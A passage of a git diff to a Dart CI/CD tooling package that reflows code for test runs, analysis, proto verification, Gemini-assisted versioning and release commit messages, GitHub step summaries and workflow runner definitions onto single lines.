]).timeout(const Duration(seconds: 30)); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -2492,26 +2247,15 @@ Future _runTest(String repoRoot) async { /// protobuf code, which are expected and must not block CI. Future _runAnalyze(String repoRoot) async { _header('Running Analysis'); - final result = await Process.run('dart', [ - 'analyze', - ], workingDirectory: repoRoot); + final result = await Process.run('dart', ['analyze'], workingDirectory: repoRoot); final output = (result.stdout as String); stdout.write(output); stderr.write(result.stderr); // Count severity levels in output - final errorCount = RegExp( - r'^\s*error\s+-\s+', - multiLine: true, - ).allMatches(output).length; - final warningCount = RegExp( - r'^\s*warning\s+-\s+', - multiLine: true, - ).allMatches(output).length; - final infoCount = RegExp( - r'^\s*info\s+-\s+', - multiLine: true, - ).allMatches(output).length; + final errorCount = RegExp(r'^\s*error\s+-\s+', multiLine: true).allMatches(output).length; + final warningCount = RegExp(r'^\s*warning\s+-\s+', multiLine: true).allMatches(output).length; + final infoCount = RegExp(r'^\s*info\s+-\s+', multiLine: true).allMatches(output).length; _info(' Errors: $errorCount, Warnings: $warningCount, Infos: $infoCount'); @@ -2572,11 +2316,7 @@ Future _runVerifyProtos(String repoRoot) async { final protoDir = Directory('$repoRoot/proto/src'); var protoCount = 0; if (protoDir.existsSync()) { - protoCount = protoDir - .listSync(recursive: true) - .whereType() - .where((f) => f.path.endsWith('.proto')) - .length; + protoCount = protoDir.listSync(recursive: true).whereType().where((f) => f.path.endsWith('.proto')).length; } _info('Proto source files in proto/src/: $protoCount'); @@ -2589,12 +2329,7 @@ Future _runVerifyProtos(String repoRoot) async { final libDir = Directory('$repoRoot/lib'); var generatedCount = 0; if (libDir.existsSync()) { - final extensions = [ - '.pb.dart', - '.pbenum.dart', - '.pbjson.dart', - '.pbgrpc.dart', - ]; + final extensions = ['.pb.dart', '.pbenum.dart', '.pbjson.dart', '.pbgrpc.dart']; generatedCount = libDir .listSync(recursive: true) .whereType() @@ -2608,9 +2343,7 @@ Future _runVerifyProtos(String repoRoot) async { exit(1); } - _success( - 'Proto verification passed: $protoCount sources, $generatedCount generated', - ); + _success('Proto verification passed: $protoCount sources, $generatedCount generated'); } /// Run documentation update via Gemini. @@ -2633,10 +2366,7 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync( - 'dart run $docScript "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2644,9 +2374,7 @@ Future _runDocumentation(String repoRoot) async { ctx.savePrompt('documentation', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)'); return; } @@ -2656,9 +2384,7 @@ Future _runDocumentation(String repoRoot) async { final includes = []; if (File('/tmp/commit_analysis.json').existsSync()) { includes.add('@/tmp/commit_analysis.json'); - } else if (File( - '$repoRoot/$kCicdRunsDir/explore/commit_analysis.json', - ).existsSync()) { + } else if (File('$repoRoot/$kCicdRunsDir/explore/commit_analysis.json').existsSync()) { includes.add('@$repoRoot/$kCicdRunsDir/explore/commit_analysis.json'); } includes.add('@README.md'); @@ -2704,33 +2430,17 @@ Future _runPreReleaseTriage(String repoRoot, List args) async { if (!_geminiAvailable(warnOnly: true)) { _warn('Producing empty issue manifest (Gemini unavailable).'); final ctx = RunContext.create(repoRoot, 'pre-release-triage'); - final emptyManifest = - '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; - ctx.saveArtifact( - 'pre-release-triage', - 'issue_manifest.json', - emptyManifest, - ); - _success( - 'Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json', - ); + final emptyManifest = '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; + ctx.saveArtifact('pre-release-triage', 'issue_manifest.json', emptyManifest); + _success('Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json'); ctx.finalize(exitCode: 0); return; } - final triageArgs = [ - '--pre-release', - '--prev-tag', - prevTag, - '--version', - newVersion, - '--force', - ]; + final triageArgs = ['--pre-release', '--prev-tag', prevTag, '--version', newVersion, '--force']; if (_verbose) triageArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -2780,9 +2490,7 @@ Future _runPostReleaseTriage(String repoRoot, List args) async { ]; if (_verbose) triageArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -2827,9 +2535,7 @@ Future _runArchiveRun(String repoRoot, List args) async { runDirPath = RunContext.findLatestRun(repoRoot); if (runDirPath == null) { _warn('No $kCicdRunsDir/ directory found — nothing to archive.'); - _info( - 'This is expected if audit trail artifacts were not transferred between jobs.', - ); + _info('This is expected if audit trail artifacts were not transferred between jobs.'); return; } _info('Using latest run: $runDirPath'); @@ -2866,9 +2572,7 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (args[i] == '--output-dir') outputDir = args[i + 1]; } - final incomingPath = incomingDir.startsWith('/') - ? incomingDir - : '$repoRoot/$incomingDir'; + final incomingPath = incomingDir.startsWith('/') ? incomingDir : '$repoRoot/$incomingDir'; final incoming = Directory(incomingPath); if (!incoming.existsSync()) { _warn('No incoming audit trails found at $incomingDir'); @@ -2884,14 +2588,8 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { // Create the merged run directory with a unique timestamp final now = DateTime.now(); - final timestamp = now - .toIso8601String() - .replaceAll(':', '-') - .replaceAll('.', '-') - .substring(0, 19); - final outputPath = outputDir.startsWith('/') - ? outputDir - : '$repoRoot/$outputDir'; + final timestamp = now.toIso8601String().replaceAll(':', '-').replaceAll('.', '-').substring(0, 19); + final outputPath = outputDir.startsWith('/') ? outputDir : '$repoRoot/$outputDir'; final mergedRunDir = '$outputPath/run_${timestamp}_merged'; Directory(mergedRunDir).createSync(recursive: true); @@ -2923,15 +2621,10 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (fileName == 'meta.json') { // Collect source meta for the merged meta.json try { - final meta = - json.decode(child.readAsStringSync()) - as Map; + final meta = json.decode(child.readAsStringSync()) as Map; sources.add({'artifact': artifactName, ...meta}); } catch (_) { - sources.add({ - 'artifact': artifactName, - 'error': 'failed to parse meta.json', - }); + sources.add({'artifact': artifactName, 'error': 'failed to parse meta.json'}); } } } @@ -2957,13 +2650,9 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { 'platform': Platform.operatingSystem, 'dart_version': Platform.version.split(' ').first, }; - File('$mergedRunDir/meta.json').writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n', - ); + File('$mergedRunDir/meta.json').writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n'); - _success( - 'Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)', - ); + _success('Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)'); } /// Recursively copy a directory tree. @@ -3093,9 +2782,7 @@ Future _installTree() async { } else if (Platform.isLinux) { _exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { - _info( - 'tree is built-in on Windows (limited). For full tree: choco install tree', - ); + _info('tree is built-in on Windows (limited). For full tree: choco install tree'); } } @@ -3104,10 +2791,7 @@ Future _installTree() async { // ═══════════════════════════════════════════════════════════════════════════════ String _detectPrevTag(String repoRoot) { - final result = _runSync( - "git tag -l 'v*' --sort=-version:refname | head -1", - repoRoot, - ); + final result = _runSync("git tag -l 'v*' --sort=-version:refname | head -1", repoRoot); if (result.isEmpty) { // No tags yet -- use the first commit (head -1 to handle multiple roots in monorepos) return _runSync('git rev-list --max-parents=0 HEAD | head -1', repoRoot); @@ -3116,10 +2800,7 @@ String _detectPrevTag(String repoRoot) { } String _detectNextVersion(String repoRoot, String prevTag) { - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); // Derive bump base from prevTag (not pubspec.yaml) to avoid stale-version collisions. final tagVersion = prevTag.startsWith('v') ? prevTag.substring(1) : prevTag; @@ -3138,20 +2819,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync( - 'git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', - repoRoot, - ); - final commitSubjects = _runSync( - 'git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', - repoRoot, - ); + final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); + final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); var bump = 'patch'; - if (RegExp( - r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', - multiLine: true, - ).hasMatch(commits)) { + if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { bump = 'major'; } else if (RegExp(r'^feat(\(.+\))?:', multiLine: true).hasMatch(commits)) { bump = 'minor'; @@ -3159,11 +2831,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { commitSubjects .split('\n') .every( - (line) => - line.trim().isEmpty || - RegExp( - r'^(chore|style|ci|docs|build)(\(.+\))?:', - ).hasMatch(line.trim()), + (line) => line.trim().isEmpty || RegExp(r'^(chore|style|ci|docs|build)(\(.+\))?:').hasMatch(line.trim()), )) { // Only pure infra/docs/style/build commits with no code changes → no release. // fix:, test:, perf:, and refactor: all default to at least patch. @@ -3173,30 +2841,15 @@ String _detectNextVersion(String repoRoot, String prevTag) { _info(' Regex heuristic: $bump'); // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── - if (_commandExists('gemini') && - Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); - final changedFiles = _runSync( - 'git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', - repoRoot, - ); - final diffStat = _runSync( - 'git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', - repoRoot, - ); - final existingTags = _runSync( - "git tag -l 'v*' --sort=-version:refname | head -10", - repoRoot, - ); + if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); + final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); + final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); final commitSummary = commits.split('\n').take(50).join('\n'); // Create a version analysis output directory within the CWD (sandbox-safe) - final versionAnalysisDir = Directory( - '$repoRoot/$kCicdRunsDir/version_analysis', - ); + final versionAnalysisDir = Directory('$repoRoot/$kCicdRunsDir/version_analysis'); versionAnalysisDir.createSync(recursive: true); final bumpJsonPath = '${versionAnalysisDir.path}/version_bump.json'; final prompt = @@ -3249,27 +2902,15 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Save Gemini response for audit trail (strip MCP/warning prefix) if (geminiResult.isNotEmpty) { final jsonStart = geminiResult.indexOf('{'); - final cleaned = jsonStart > 0 - ? geminiResult.substring(jsonStart) - : geminiResult; - File( - '${versionAnalysisDir.path}/gemini_response.json', - ).writeAsStringSync(cleaned); + final cleaned = jsonStart > 0 ? geminiResult.substring(jsonStart) : geminiResult; + File('${versionAnalysisDir.path}/gemini_response.json').writeAsStringSync(cleaned); } if (geminiResult.isNotEmpty && File(bumpJsonPath).existsSync()) { try { - final bumpData = - json.decode(File(bumpJsonPath).readAsStringSync()) - as Map; - final rawBump = (bumpData['bump'] as String?) - ?.trim() - .toLowerCase() - .replaceAll(RegExp(r'[^a-z]'), ''); - if (rawBump == 'major' || - rawBump == 'minor' || - rawBump == 'patch' || - rawBump == 'none') { + final bumpData = json.decode(File(bumpJsonPath).readAsStringSync()) as Map; + final rawBump = (bumpData['bump'] as String?)?.trim().toLowerCase().replaceAll(RegExp(r'[^a-z]'), ''); + if (rawBump == 'major' || rawBump == 'minor' || rawBump == 'patch' || rawBump == 'none') { _info(' Gemini analysis: $rawBump (overriding regex: $bump)'); bump = rawBump!; } else { @@ -3308,9 +2949,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Guard: ensure version never goes backward from what pubspec.yaml already has if (_compareVersions(nextVersion, currentVersion) < 0) { - _warn( - 'Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.', - ); + _warn('Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.'); return currentVersion; } @@ -3392,19 +3031,13 @@ String _buildReleaseCommitMessage({ buf.writeln('## Changelog'); buf.writeln(); // Trim to first 2000 chars to keep commit message reasonable - buf.writeln( - entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry, - ); + buf.writeln(entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry); buf.writeln(); } } // Staged file summary - final stagedResult = Process.runSync('git', [ - 'diff', - '--cached', - '--stat', - ], workingDirectory: repoRoot); + final stagedResult = Process.runSync('git', ['diff', '--cached', '--stat'], workingDirectory: repoRoot); final stagedStat = (stagedResult.stdout as String).trim(); if (stagedStat.isNotEmpty) { buf.writeln('## Files Modified'); @@ -3422,11 +3055,7 @@ String _buildReleaseCommitMessage({ if (rationale.isNotEmpty) { buf.writeln('## Version Bump Rationale'); buf.writeln(); - buf.writeln( - rationale.length > 1000 - ? '${rationale.substring(0, 1000)}...' - : rationale, - ); + buf.writeln(rationale.length > 1000 ? '${rationale.substring(0, 1000)}...' : rationale); buf.writeln(); } } @@ -3454,14 +3083,9 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); buf.writeln('---'); - buf.writeln( - 'Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)', - ); + buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); buf.writeln('Commits since $prevTag: $commitCount'); buf.writeln('Generated: ${DateTime.now().toUtc().toIso8601String()}'); @@ -3480,10 +3104,7 @@ bool _commandExists(String command) { String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); - final result = Process.runSync('sh', [ - '-c', - command, - ], workingDirectory: workingDirectory); + final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); final output = (result.stdout as String).trim(); if (_verbose && output.isNotEmpty) _info(' $output'); return output; @@ -3526,11 +3147,8 @@ String _releaseLink(String tag) { /// ``` /// Idempotent: replaces any existing reference-link block. void _addChangelogReferenceLinks(String repoRoot, String content) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; // Extract all version headers: ## [X.Y.Z] (skip any [Unreleased] entries) final versionPattern = RegExp(r'^## \[([^\]]+)\]', multiLine: true); @@ -3538,10 +3156,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (matches.isEmpty) return; - final versions = matches - .map((m) => m.group(1)!) - .where((v) => v != 'Unreleased') - .toList(); + final versions = matches.map((m) => m.group(1)!).where((v) => v != 'Unreleased').toList(); if (versions.isEmpty) return; @@ -3552,9 +3167,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (i + 1 < versions.length) { // Compare from previous version final prevVersion = versions[i + 1]; - links.writeln( - '[$version]: $server/$repo/compare/v$prevVersion...v$version', - ); + links.writeln('[$version]: $server/$repo/compare/v$prevVersion...v$version'); } else { // Oldest version: link to the tag itself links.writeln('[$version]: $server/$repo/releases/tag/v$version'); @@ -3565,9 +3178,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (linksStr.isEmpty) return; // Strip any existing reference-link block (lines matching [X.Y.Z]: http...) - final existingLinksPattern = RegExp( - r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$', - ); + final existingLinksPattern = RegExp(r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$'); var cleaned = content.replaceAll(existingLinksPattern, ''); cleaned = cleaned.trimRight(); @@ -3589,12 +3200,7 @@ String _readFileOr(String path, [String fallback = '(not available)']) { } /// Execute a command. Set [fatal] to true to exit on failure (default: false). -void _exec( - String executable, - List args, { - String? cwd, - bool fatal = false, -}) { +void _exec(String executable, List args, {String? cwd, bool fatal = false}) { if (_verbose) _info(' \$ $executable ${args.join(" ")}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { @@ -3605,9 +3211,7 @@ void _exec( void _requireGeminiCli() { if (!_commandExists('gemini')) { - _error( - 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', - ); + _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); exit(1); } } @@ -3616,9 +3220,7 @@ void _requireApiKey() { final key = Platform.environment['GEMINI_API_KEY']; if (key == null || key.isEmpty) { _error('GEMINI_API_KEY is not set.'); - _error( - 'Set it via: export GEMINI_API_KEY=', - ); + _error('Set it via: export GEMINI_API_KEY='); exit(1); } } @@ -3631,9 +3233,7 @@ bool _geminiAvailable({bool warnOnly = false}) { _warn('Gemini CLI not installed — skipping Gemini-powered step.'); return false; } - _error( - 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', - ); + _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); exit(1); } final key = Platform.environment['GEMINI_API_KEY']; @@ -3737,15 +3337,9 @@ Future _runInit(String repoRoot) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); if (pubspecFile.existsSync()) { final content = pubspecFile.readAsStringSync(); - final nameMatch = RegExp( - r'^name:\s*(\S+)', - multiLine: true, - ).firstMatch(content); + final nameMatch = RegExp(r'^name:\s*(\S+)', multiLine: true).firstMatch(content); if (nameMatch != null) packageName = nameMatch.group(1)!; - final versionMatch = RegExp( - r'^version:\s*(\S+)', - multiLine: true, - ).firstMatch(content); + final versionMatch = RegExp(r'^version:\s*(\S+)', multiLine: true).firstMatch(content); if (versionMatch != null) packageVersion = versionMatch.group(1)!; _success('Detected package: $packageName v$packageVersion'); } else { @@ -3774,11 +3368,7 @@ Future _runInit(String repoRoot) async { if (repoOwner == 'unknown') { // Fallback: try parsing git remote try { - final gitResult = Process.runSync('git', [ - 'remote', - 'get-url', - 'origin', - ], workingDirectory: repoRoot); + final gitResult = Process.runSync('git', ['remote', 'get-url', 'origin'], workingDirectory: repoRoot); if (gitResult.exitCode == 0) { final url = (gitResult.stdout as String).trim(); // git@github.com:owner/repo.git or https://github.com/owner/repo.git @@ -3834,12 +3424,7 @@ Future _runInit(String repoRoot) async { 'release_notes_path': '$kReleaseNotesDir', }, 'gcp': {'project': ''}, - 'sentry': { - 'organization': '', - 'projects': [], - 'scan_on_pre_release': false, - 'recent_errors_hours': 168, - }, + 'sentry': {'organization': '', 'projects': [], 'scan_on_pre_release': false, 'recent_errors_hours': 168}, 'release': { 'pre_release_scan_sentry': false, 'pre_release_scan_github': true, @@ -3858,25 +3443,13 @@ Future _runInit(String repoRoot) async { }, }, 'labels': { - 'type': [ - 'bug', - 'feature-request', - 'enhancement', - 'documentation', - 'question', - ], + 'type': ['bug', 'feature-request', 'enhancement', 'documentation', 'question'], 'priority': ['P0-critical', 'P1-high', 'P2-medium', 'P3-low'], 'area': areaLabels, }, 'thresholds': {'auto_close': 0.9, 'suggest_close': 0.7, 'comment': 0.5}, 'agents': { - 'enabled': [ - 'code_analysis', - 'pr_correlation', - 'duplicate', - 'sentiment', - 'changelog', - ], + 'enabled': ['code_analysis', 'pr_correlation', 'duplicate', 'sentiment', 'changelog'], 'conditional': { 'changelog': {'require_file': 'CHANGELOG.md'}, }, @@ -3896,9 +3469,7 @@ Future _runInit(String repoRoot) async { }, }; - configFile.writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(configData)}\n', - ); + configFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(configData)}\n'); _success('Created $kConfigFileName'); } else { _info('$kConfigFileName already exists (kept as-is)'); @@ -3923,16 +3494,12 @@ Future _runInit(String repoRoot) async { if (gitignoreFile.existsSync()) { final content = gitignoreFile.readAsStringSync(); if (!content.contains('.runtime_ci/runs/')) { - gitignoreFile.writeAsStringSync( - '$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', - ); + gitignoreFile.writeAsStringSync('$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); _success('Added .runtime_ci/runs/ to .gitignore'); repaired++; } } else { - gitignoreFile.writeAsStringSync( - '# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', - ); + gitignoreFile.writeAsStringSync('# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); _success('Created .gitignore with .runtime_ci/runs/'); repaired++; } @@ -3955,9 +3522,7 @@ Future _runInit(String repoRoot) async { print(''); if (!configExists) { _info('Next steps:'); - _info( - ' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.', - ); + _info(' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.'); _info(' 2. Add runtime_ci_tooling as a dev_dependency in pubspec.yaml'); _info(' 3. Run: dart run runtime_ci_tooling:manage_cicd setup'); _info(' 4. Run: dart run runtime_ci_tooling:manage_cicd status'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 763ae86..8af587f 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -44,8 +44,7 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; final repo = Platform.environment['GITHUB_REPOSITORY']; final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; @@ -54,33 +53,24 @@ abstract final class StepSummary { /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -93,11 +83,7 @@ abstract final class StepSummary { /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input - .replaceAll('&', '&') - .replaceAll('<', '<') - .replaceAll('>', '>') - .replaceAll('"', '"'); + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); } /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. @@ -168,8 +154,7 @@ abstract final class StepSummary { if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); testErrors[id]!.write(event['error'] as String? ?? ''); testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) - testStackTraces[id]!.write('\n---\n'); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); case 'print': @@ -196,9 +181,7 @@ abstract final class StepSummary { final buf = StringBuffer(); final platformId = - Platform.environment['PLATFORM_ID'] ?? - Platform.environment['RUNNER_NAME'] ?? - Platform.operatingSystem; + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; buf.writeln('## Test Results — ${escapeHtml(platformId)}'); buf.writeln(); @@ -207,9 +190,7 @@ abstract final class StepSummary { final status = exitCode == 0 ? 'passed' : 'failed'; final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; buf.writeln('> [!$icon]'); - buf.writeln( - '> Tests $status (exit code $exitCode) — no structured results available.', - ); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); buf.writeln(); buf.writeln('Check the expanded output in test logs for details.'); buf.writeln(); @@ -247,15 +228,11 @@ abstract final class StepSummary { for (final f in displayFailures) { final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; buf.writeln('
'); - buf.writeln( - ':x: ${escapeHtml(f.name)}$durStr', - ); + buf.writeln(':x: ${escapeHtml(f.name)}$durStr'); buf.writeln(); if (f.error.isNotEmpty) { - final error = f.error.length > 2000 - ? '${f.error.substring(0, 2000)}\n... (truncated)' - : f.error; + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); final fence = _codeFence(error); buf.writeln(fence); @@ -279,9 +256,7 @@ abstract final class StepSummary { if (f.printOutput.isNotEmpty) { final trimmed = f.printOutput.trimRight(); final lineCount = trimmed.split('\n').length; - final printPreview = trimmed.length > 1500 - ? '${trimmed.substring(0, 1500)}\n... (truncated)' - : trimmed; + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); final fence = _codeFence(printPreview); buf.writeln(fence); @@ -295,9 +270,7 @@ abstract final class StepSummary { } if (results.failures.length > 20) { - buf.writeln( - '_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._', - ); + buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); buf.writeln(); } } diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 26208a3..b86c3de 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -12,11 +12,7 @@ class _PlatformDefinition { final String arch; // x64 | arm64 final String runner; // default `runs-on:` label - const _PlatformDefinition({ - required this.osFamily, - required this.arch, - required this.runner, - }); + const _PlatformDefinition({required this.osFamily, required this.arch, required this.runner}); } /// Maps platform identifiers to their default runner label + metadata. @@ -25,16 +21,8 @@ class _PlatformDefinition { /// `ci.runner_overrides: { "": "" }` const _platformDefinitions = { // Linux — org-managed runners - 'ubuntu': _PlatformDefinition( - osFamily: 'linux', - arch: 'x64', - runner: 'runtime-ubuntu-24.04-x64-256gb-64core', - ), - 'ubuntu-x64': _PlatformDefinition( - osFamily: 'linux', - arch: 'x64', - runner: 'runtime-ubuntu-24.04-x64-256gb-64core', - ), + 'ubuntu': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), + 'ubuntu-x64': _PlatformDefinition(osFamily: 'linux', arch: 'x64', runner: 'runtime-ubuntu-24.04-x64-256gb-64core'), 'ubuntu-arm64': _PlatformDefinition( osFamily: 'linux', arch: 'arm64', @@ -42,33 +30,13 @@ const _platformDefinitions = { ), // macOS — standard GitHub-hosted runners (no org-managed equivalents) - 'macos': _PlatformDefinition( - osFamily: 'macos', - arch: 'arm64', - runner: 'macos-latest', - ), - 'macos-arm64': _PlatformDefinition( - osFamily: 'macos', - arch: 'arm64', - runner: 'macos-latest', - ), - 'macos-x64': _PlatformDefinition( - osFamily: 'macos', - arch: 'x64', - runner: 'macos-15-large', - ), + 'macos': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), + 'macos-arm64': _PlatformDefinition(osFamily: 'macos', arch: 'arm64', runner: 'macos-latest'), + 'macos-x64': _PlatformDefinition(osFamily: 'macos', arch: 'x64', runner: 'macos-15-large'), // Windows — org-managed runners - 'windows': _PlatformDefinition( - osFamily: 'windows', - arch: 